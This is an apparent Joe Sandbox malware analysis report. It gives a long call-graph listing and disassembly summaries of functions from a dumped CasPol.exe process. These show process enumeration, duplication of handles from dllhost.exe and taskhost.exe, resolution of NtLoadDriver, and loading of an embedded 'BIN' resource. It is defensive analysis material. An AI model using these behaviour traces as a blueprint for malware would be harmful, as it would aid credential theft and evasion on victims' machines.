39639->39598 39640->39607 39641->39607 39642->39607 39643->39607 39644->39613 39645->39607 39646->39607 39647->39637 39648->39637 39649->39613 39650->39612 39651->39633 39652->39626 39653->39624 39654->39624 39655->39632 39656->39613 39657->38715 39658->38722 39659 44dea5 39660 44deb5 FreeLibrary 39659->39660 39661 44dec3 39659->39661 39660->39661 39662 4147f3 39665 414561 39662->39665 39664 414813 39666 41456d 39665->39666 39667 41457f GetPrivateProfileIntW 39665->39667 39670 4143f1 memset _itow WritePrivateProfileStringW 39666->39670 39667->39664 39669 41457a 39669->39664 39670->39669 39671 44def7 39672 44df07 39671->39672 39673 44df00 ??3@YAXPAX 39671->39673 39674 44df17 39672->39674 39675 44df10 ??3@YAXPAX 39672->39675 39673->39672 39676 44df27 39674->39676 39677 44df20 ??3@YAXPAX 39674->39677 39675->39674 39678 44df37 39676->39678 39679 44df30 ??3@YAXPAX 39676->39679 39677->39676 39679->39678 39680 4287c1 39681 4287d2 39680->39681 39682 429ac1 39680->39682 39683 428818 39681->39683 39684 42881f 39681->39684 39698 425711 39681->39698 39694 425ad6 39682->39694 39750 415c56 11 API calls 39682->39750 39717 42013a 39683->39717 39745 420244 97 API calls 39684->39745 39689 4260dd 39744 424251 120 API calls 39689->39744 39691 4259da 39743 416760 11 API calls 39691->39743 39697 429a4d 39699 429a66 39697->39699 39704 429a9b 39697->39704 39698->39682 39698->39691 39698->39697 39700 422aeb memset memcpy memcpy 39698->39700 39703 4260a1 39698->39703 39713 4259c2 39698->39713 39716 425a38 39698->39716 39733 4227f0 memset memcpy 39698->39733 39734 422b84 15 API calls 39698->39734 39735 422b5d memset memcpy memcpy 39698->39735 39736 422640 13 API calls 39698->39736 39738 4241fc 11 API calls 39698->39738 39739 42413a 90 API calls 39698->39739 39746 415c56 11 API calls 39699->39746 39700->39698 39742 415c56 11 API calls 39703->39742 39705 429a96 39704->39705 39748 416760 11 API calls 39704->39748 39749 424251 120 API calls 39705->39749 39707 429a7a 39747 416760 11 API calls 39707->39747 39713->39694 39737 415c56 11 API calls 39713->39737 39716->39713 39740 422640 13 API calls 39716->39740 39741 4226e0 12 API calls 39716->39741 39718 42014c 39717->39718 39721 420151 39717->39721 39760 41e466 97 API calls 39718->39760 39720 420162 39720->39698 39721->39720 39722 4201b3 39721->39722 39723 420229 39721->39723 39724 4201b8 39722->39724 39725 4201dc 39722->39725 39723->39720 39726 41fd5e 86 API calls 39723->39726 39751 41fbdb 39724->39751 39725->39720 39729 4201ff 39725->39729 39757 41fc4c 39725->39757 39726->39720 39729->39720 39732 42013a 97 API calls 39729->39732 39732->39720 39733->39698 39734->39698 39735->39698 39736->39698 39737->39691 39738->39698 39739->39698 39740->39716 39741->39716 39742->39691 39743->39689 39744->39694 39745->39698 39746->39707 39747->39705 39748->39705 39749->39682 39750->39691 39752 41fbf1 39751->39752 39753 41fbf8 39751->39753 39756 41fc39 39752->39756 39775 4446ce 11 API calls 39752->39775 39765 41ee26 39753->39765 39756->39720 39761 41fd5e 39756->39761 39758 41ee6b 86 API calls 39757->39758 39759 41fc5d 39758->39759 39759->39725 39760->39721 39762 41fd65 39761->39762 39763 41fdab 39762->39763 39764 41fbdb 86 API calls 39762->39764 39763->39720 39764->39762 39766 41ee41 39765->39766 39767 41ee32 39765->39767 39776 41edad 39766->39776 39779 4446ce 11 API calls 39767->39779 39771 41ee3c 39771->39752 39773 41ee58 39773->39771 39781 41ee6b 39773->39781 39775->39756 39785 41be52 39776->39785 39779->39771 39780 41eb85 11 API calls 39780->39773 39782 41ee70 39781->39782 39783 41ee78 39781->39783 39826 41bf99 86 API calls 39782->39826 39783->39771 39786 41be6f 39785->39786 39787 41be5f 39785->39787 39791 41be8c 39786->39791 39806 418c63 39786->39806 39820 4446ce 11 API calls 39787->39820 39789 41be69 39789->39771 39789->39780 39791->39789 39792 41bf3a 39791->39792 39794 41bed1 39791->39794 39804 41bee7 39791->39804 39823 4446ce 11 API calls 39792->39823 39796 41bef0 39794->39796 39797 41bee2 39794->39797 39799 41bf01 39796->39799 39796->39804 39810 41ac13 39797->39810 39798 41bf24 memset 39798->39789 39799->39798 39801 41bf14 39799->39801 39821 418a6d memset memcpy memset 39799->39821 39822 41a223 memset memcpy memset 39801->39822 39804->39789 39824 41a453 86 API calls 39804->39824 39805 41bf20 39805->39798 39809 418c72 39806->39809 39807 418c94 39807->39791 39808 418d51 memset memset 39808->39807 39809->39807 39809->39808 39811 41ac3f memset 39810->39811 39813 41ac52 39810->39813 39812 41acd9 39811->39812 39812->39804 39815 41ac6a 39813->39815 39825 41dc14 19 API calls 39813->39825 39816 41aca1 39815->39816 39817 41519d 6 API calls 39815->39817 39816->39812 39818 41acc0 memset 39816->39818 39819 41accd memcpy 39816->39819 39817->39816 39818->39812 39819->39812 39820->39789 39821->39801 39822->39805 39823->39804 39825->39815 39826->39783 39827 417bc5 39828 417c61 39827->39828 39829 417bda 39827->39829 39829->39828 39830 417bf6 UnmapViewOfFile CloseHandle 39829->39830 39832 417c2c 39829->39832 39834 4175b7 39829->39834 39830->39829 39830->39830 39832->39829 39839 41851e 20 API calls 39832->39839 39835 4175d6 CloseHandle 39834->39835 39836 4175c8 39835->39836 39837 4175df 39835->39837 39836->39837 39838 4175ce Sleep 39836->39838 39837->39829 39838->39835 39839->39832 39840 4152c6 malloc 39841 4152e2 39840->39841 39842 4152ef 39840->39842 39844 416760 11 API calls 39842->39844 39844->39841 39845 4148b6 FindResourceW 39846 4148cf SizeofResource 39845->39846 39849 4148f9 39845->39849 39847 4148e0 LoadResource 39846->39847 39846->39849 39848 4148ee LockResource 39847->39848 39847->39849 39848->39849 39850 441b3f 39860 43a9f6 39850->39860 39852 441b61 40033 4386af memset 39852->40033 39854 44189a 39855 442bd4 39854->39855 39856 4418e2 39854->39856 39857 4418ea 39855->39857 40035 441409 memset 39855->40035 39856->39857 40034 4414a9 12 API calls 39856->40034 39861 43aa20 39860->39861 39862 43aadf 39860->39862 39861->39862 39863 43aa34 memset 39861->39863 39862->39852 39864 43aa56 39863->39864 39865 43aa4d 39863->39865 40036 43a6e7 39864->40036 40044 42c02e memset 39865->40044 39870 43aad3 40046 4169a7 11 API calls 39870->40046 39871 43aaae 39871->39862 39871->39870 39886 43aae5 39871->39886 39872 43ac18 39875 43ac47 39872->39875 40048 42bbd5 memcpy memcpy memcpy memset memcpy 39872->40048 39876 43aca8 39875->39876 40049 438eed 16 API calls 39875->40049 39879 43acd5 39876->39879 40051 4233ae 11 API calls 39876->40051 40052 423426 11 API calls 39879->40052 39880 43ac87 40050 4233c5 16 API calls 39880->40050 39884 43ace1 40053 439811 163 API calls 39884->40053 39885 43a9f6 161 API calls 39885->39886 39886->39862 39886->39872 39886->39885 40047 439bbb 22 API calls 39886->40047 39888 43acfd 39894 43ad2c 39888->39894 40054 438eed 16 API calls 39888->40054 39890 43ad19 40055 4233c5 16 API calls 39890->40055 39891 43ad58 40056 44081d 163 API calls 39891->40056 39894->39891 39897 43add9 39894->39897 39896 43ae3a memset 39898 43ae73 39896->39898 39897->39897 40060 423426 11 API calls 39897->40060 40061 42e1c0 147 API calls 39898->40061 39899 43adab 40058 438c4e 163 API calls 39899->40058 39902 43ad6c 39902->39862 39902->39899 40057 42370b memset memcpy memset 39902->40057 39903 43adcc 40059 440f84 12 API calls 39903->40059 39904 43ae96 40062 42e1c0 147 API calls 39904->40062 39908 43aea8 39909 43aec1 39908->39909 40063 42e199 147 API calls 39908->40063 39911 43af00 39909->39911 40064 42e1c0 147 API calls 39909->40064 39911->39862 39914 43af1a 39911->39914 39915 43b3d9 39911->39915 40065 438eed 16 API calls 39914->40065 39920 43b3f6 39915->39920 39924 43b4c8 39915->39924 39917 43b60f 39917->39862 40124 4393a5 17 API calls 39917->40124 39918 43af2f 40066 4233c5 16 API calls 39918->40066 40106 432878 12 API calls 39920->40106 39922 43af51 40067 423426 11 API calls 39922->40067 39930 43b4f2 39924->39930 40112 42bbd5 memcpy memcpy memcpy memset memcpy 39924->40112 39926 43af7d 40068 423426 11 API calls 39926->40068 40113 43a76c 21 API calls 39930->40113 39931 43b529 40114 44081d 163 API calls 39931->40114 39932 43b462 40108 423330 11 API calls 39932->40108 39933 43af94 40069 423330 11 API calls 39933->40069 39937 43b47e 39941 43b497 39937->39941 40109 42374a memcpy memset memcpy memcpy memcpy 39937->40109 39938 43b544 39942 43b55c 39938->39942 40115 42c02e memset 39938->40115 39939 43b428 39939->39932 40107 432b60 16 API calls 39939->40107 39940 43afca 40070 423330 11 API calls 39940->40070 40110 4233ae 11 API calls 39941->40110 40116 43a87a 163 API calls 39942->40116 39948 43afdb 40071 4233ae 11 API calls 39948->40071 39950 43b56c 39953 43b58a 39950->39953 40117 423330 11 API calls 39950->40117 39951 43b4b1 40111 423399 11 API calls 39951->40111 39952 43afee 40072 44081d 163 API calls 39952->40072 40118 440f84 12 API calls 39953->40118 39958 43b4c1 40120 42db80 163 API calls 39958->40120 39960 43b592 40119 43a82f 16 API calls 39960->40119 39963 43b5b4 40121 438c4e 163 API calls 39963->40121 39965 43b5cf 40122 42c02e memset 39965->40122 39967 43b1ef 40083 4233c5 16 API calls 39967->40083 39968 43b005 39968->39862 39971 43b01f 39968->39971 40073 42d836 163 API calls 39968->40073 39971->39967 40081 423330 11 API calls 39971->40081 40082 42d71d 163 API calls 39971->40082 39972 43b212 40084 423330 11 API calls 39972->40084 39973 43b087 40074 4233ae 11 API calls 39973->40074 39975 43add4 39975->39917 40123 438f86 16 API calls 39975->40123 39979 43b22a 40085 42ccb5 11 API calls 39979->40085 39981 43b10f 40077 423330 11 API calls 39981->40077 39982 43b23f 40086 4233ae 11 API calls 39982->40086 39984 43b257 40087 4233ae 11 API calls 39984->40087 39988 43b129 40078 4233ae 11 API calls 39988->40078 39989 43b26e 40088 4233ae 11 API calls 39989->40088 39992 43b09a 39992->39981 40075 42cc15 19 API calls 39992->40075 40076 4233ae 11 API calls 39992->40076 39993 43b282 40089 43a87a 163 API calls 39993->40089 39995 43b13c 40079 440f84 12 API calls 39995->40079 39997 43b29d 40090 423330 11 API calls 39997->40090 40000 43b15f 40080 4233ae 11 API calls 40000->40080 40001 43b2af 40003 43b2b8 40001->40003 40004 43b2ce 40001->40004 40091 4233ae 11 API calls 40003->40091 40092 440f84 12 API calls 40004->40092 40007 43b2da 40093 42370b memset memcpy memset 40007->40093 40008 43b2c9 40094 4233ae 11 API calls 40008->40094 40011 43b2f9 40095 423330 11 API calls 40011->40095 40013 43b30b 40096 423330 11 API calls 40013->40096 40015 43b325 40097 423399 11 API calls 40015->40097 40017 43b332 40098 4233ae 11 API calls 40017->40098 40019 43b354 40099 423399 11 API calls 40019->40099 40021 43b364 40100 43a82f 16 API calls 40021->40100 40023 43b370 40101 42db80 163 API calls 40023->40101 40025 43b380 40102 438c4e 163 API calls 40025->40102 40027 43b39e 40103 423399 11 API calls 40027->40103 40029 43b3ae 40104 43a76c 21 API calls 40029->40104 40031 43b3c3 40105 423399 11 API calls 40031->40105 40033->39854 40034->39857 40035->39855 40037 43a6f5 40036->40037 40038 43a765 40036->40038 40037->40038 40125 42a115 40037->40125 40038->39862 40045 4397fd memset 40038->40045 40042 43a73d 40042->40038 40043 42a115 147 API calls 40042->40043 40043->40038 40044->39864 40045->39871 40046->39862 40047->39886 40048->39875 40049->39880 40050->39876 40051->39879 40052->39884 40053->39888 40054->39890 40055->39894 40056->39902 40057->39899 40058->39903 40059->39975 40060->39896 40061->39904 40062->39908 40063->39909 40064->39909 40065->39918 40066->39922 40067->39926 40068->39933 40069->39940 40070->39948 40071->39952 40072->39968 40073->39973 40074->39992 40075->39992 40076->39992 40077->39988 40078->39995 40079->40000 40080->39971 40081->39971 40082->39971 40083->39972 40084->39979 40085->39982 40086->39984 40087->39989 40088->39993 40089->39997 40090->40001 40091->40008 40092->40007 40093->40008 40094->40011 40095->40013 40096->40015 40097->40017 40098->40019 40099->40021 40100->40023 40101->40025 40102->40027 40103->40029 40104->40031 40105->39975 40106->39939 40107->39932 40108->39937 40109->39941 40110->39951 40111->39958 40112->39930 40113->39931 40114->39938 40115->39942 40116->39950 40117->39953 40118->39960 40119->39958 40120->39963 40121->39965 40122->39975 40123->39917 40124->39862 40126 42a175 40125->40126 40128 42a122 40125->40128 40126->40038 40131 42b13b 147 API calls 40126->40131 40128->40126 40129 42a115 147 API calls 40128->40129 40132 43a174 40128->40132 40156 42a0a8 147 API calls 40128->40156 40129->40128 40131->40042 40146 43a196 40132->40146 40147 43a19e 40132->40147 40133 43a306 40133->40146 40170 4388c4 14 API calls 40133->40170 40136 42a115 147 API calls 40136->40147 40137 415a91 memset 40137->40147 40138 43a642 40138->40146 40175 4169a7 11 API calls 40138->40175 40142 43a635 40174 42c02e memset 40142->40174 40146->40128 40147->40133 40147->40136 40147->40137 40147->40146 40157 42ff8c 40147->40157 40165 4165ff 11 API calls 40147->40165 40166 439504 13 API calls 40147->40166 40167 4312d0 147 API calls 40147->40167 40168 42be4c memcpy memcpy memcpy memset memcpy 40147->40168 40169 43a121 11 API calls 40147->40169 40149 4169a7 11 API calls 40150 43a325 40149->40150 40150->40138 40150->40142 40150->40146 40150->40149 40151 42b5b5 memset memcpy 40150->40151 40152 42bf4c 14 API calls 40150->40152 40171 42b63e 14 API calls 40150->40171 40172 4165ff 11 API calls 40150->40172 40173 42bfcf memcpy 40150->40173 40151->40150 40152->40150 40156->40128 40176 43817e 40157->40176 40159 42ff99 40160 42ffe3 40159->40160 40161 42ffd0 40159->40161 40164 42ff9d 40159->40164 40181 4169a7 11 API calls 40160->40181 40180 4169a7 11 API calls 40161->40180 40164->40147 40165->40147 40166->40147 40167->40147 40168->40147 40169->40147 40170->40150 40171->40150 40172->40150 40173->40150 40174->40138 40175->40146 40177 438187 40176->40177 40179 438192 40176->40179 40182 4380f6 40177->40182 40179->40159 40180->40164 40181->40164 40184 43811f 40182->40184 40183 438164 40183->40179 40184->40183 40187 437e5e 40184->40187 40210 4300e8 memset memset memcpy 40184->40210 40211 437d3c 40187->40211 40189 437eb3 40189->40184 40190 437ea9 40190->40189 40195 437f22 40190->40195 40226 41f432 40190->40226 40193 437f06 40237 415c56 11 API calls 40193->40237 40197 432d4e 3 API calls 40195->40197 40200 437f7f 40195->40200 40196 437f95 40238 415c56 11 API calls 40196->40238 40197->40200 40198 43802b 40239 4165ff 11 API calls 40198->40239 40200->40196 40200->40198 40202 438054 40240 437371 138 API calls 40202->40240 40205 43806b 40206 438094 40205->40206 40241 42f50e 138 API calls 40205->40241 40208 437fa3 40206->40208 40242 4300e8 memset memset memcpy 40206->40242 40208->40189 40243 41f638 104 API calls 40208->40243 40210->40184 40212 437d69 40211->40212 40215 437d80 40211->40215 40244 437ccb 11 API calls 40212->40244 40214 437d76 40214->40190 40215->40214 40216 437da3 40215->40216 40218 437d90 40215->40218 40219 438460 134 API calls 40216->40219 40218->40214 40248 437ccb 11 API calls 40218->40248 40222 437dcb 40219->40222 40220 437de8 40247 424f26 123 API calls 40220->40247 40222->40220 40245 444283 13 API calls 40222->40245 40224 437dfc 40246 437ccb 11 API calls 40224->40246 40232 41f44f 40226->40232 40236 41f54d 40226->40236 40227 41f466 40227->40193 40227->40195 40232->40227 40234 41f50b 40232->40234 40249 41f1a5 40232->40249 40274 41c06f memcmp 40232->40274 40275 41f3b1 90 API calls 40232->40275 40276 41f398 86 API calls 40232->40276 40234->40227 40234->40236 40277 41c295 86 API calls 40234->40277 40236->40227 40278 41c635 memset memset 40236->40278 40237->40189 40238->40208 40239->40202 40240->40205 40241->40206 40242->40208 40243->40189 40244->40214 40245->40224 40246->40220 40247->40214 40248->40214 40250 41bc3b 101 API calls 40249->40250 40251 41f1b4 40250->40251 40252 41edad 86 API calls 40251->40252 40259 41f282 40251->40259 40253 41f1cb 40252->40253 40254 41f1f5 memcmp 40253->40254 40255 41f20e 40253->40255 40253->40259 40254->40255 40256 41f21b memcmp 40255->40256 40255->40259 40257 41f326 40256->40257 40260 41f23d 40256->40260 40258 41ee6b 86 API calls 40257->40258 40257->40259 40258->40259 40259->40232 40260->40257 40261 41f28e memcmp 40260->40261 40263 41c8df 56 API calls 40260->40263 40261->40257 40262 41f2a9 40261->40262 40262->40257 40265 41f308 40262->40265 40266 41f2d8 40262->40266 40264 41f269 40263->40264 40264->40257 40267 41f287 40264->40267 40268 41f27a 40264->40268 40265->40257 40272 4446ce 11 API calls 40265->40272 40269 41ee6b 86 API calls 40266->40269 40267->40261 40270 41ee6b 86 API calls 40268->40270 40271 41f2e0 40269->40271 40270->40259 40273 41b1ca memset 40271->40273 40272->40257 40273->40259 40274->40232 40275->40232 40276->40232 40277->40236 40278->40227 40279 41493c EnumResourceNamesW 40280 44660a 40283 4465e4 40280->40283 40282 446613 40284 4465f3 __dllonexit 40283->40284 40285 4465ed _onexit 40283->40285 40284->40282 40285->40284

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                  • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                  • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                  • API String ID: 708747863-3398334509
                                                                                                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                  Function 00413D4C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                  • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                  • API String ID: 3536422406-1740548384
                                                                                                                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                  • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                  • String ID: BIN
                                                                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1355100292-0
                                                                                                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
